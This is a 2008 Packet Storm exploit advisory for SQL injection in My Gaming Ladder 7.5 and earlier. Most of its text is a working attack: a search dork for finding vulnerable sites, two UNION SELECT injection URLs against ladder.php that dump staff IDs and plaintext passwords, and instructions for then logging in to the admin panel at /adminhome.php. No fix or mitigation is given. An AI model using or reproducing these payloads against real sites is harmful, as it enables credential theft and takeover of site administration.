mgl-sql.txt

2008-04-08T00:00:00
ID PACKETSTORM:65285
Type packetstorm
Reporter t0pp8uzz
Modified 2008-04-08T00:00:00

Description

                                        
                                            `--==+================================================================================+==--  
--==+ My Gaming Ladder 7.5 AND Prior SQL Injection Vulnerbilitys +==--  
--==+================================================================================+==--  
  
  
  
AUTHOR: t0pP8uZz  
SITE: www.mygamingladder.com  
DORK (altavista.com/googles): "Ladder Scripts by"  
  
  
DESCRIPTION:   
pull admin/user info from the database  
  
  
EXPLOITS:  
ADMINS/STAFF: http://site.com/ladder.php?ladderid=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,concat(0x3C666F6E7420636F6C6F723D22726564223E,id,char(58),pass,0x3C2F666F6E743E),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/staff/*  
  
USERS: http://site.com/ladder.php?ladderid=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,concat(0x3C666F6E7420636F6C6F723D22726564223E,alias,char(58),pass,0x3C2F666F6E743E),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/staff/*  
  
  
NOTE/TIP:   
admin login is at "/adminhome.php"  
passwords are in plaintext  
once you have visited the injection, scroll down and you will see all user/passwords in RED text.  
  
you must login to admincp with the admin ID this is the number next to the password.  
  
  
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !  
  
  
  
--==+================================================================================+==--  
--==+ My Gaming Ladder 7.5 AND Prior SQL Injection Vulnerbilitys +==--  
--==+================================================================================+==--  
  
`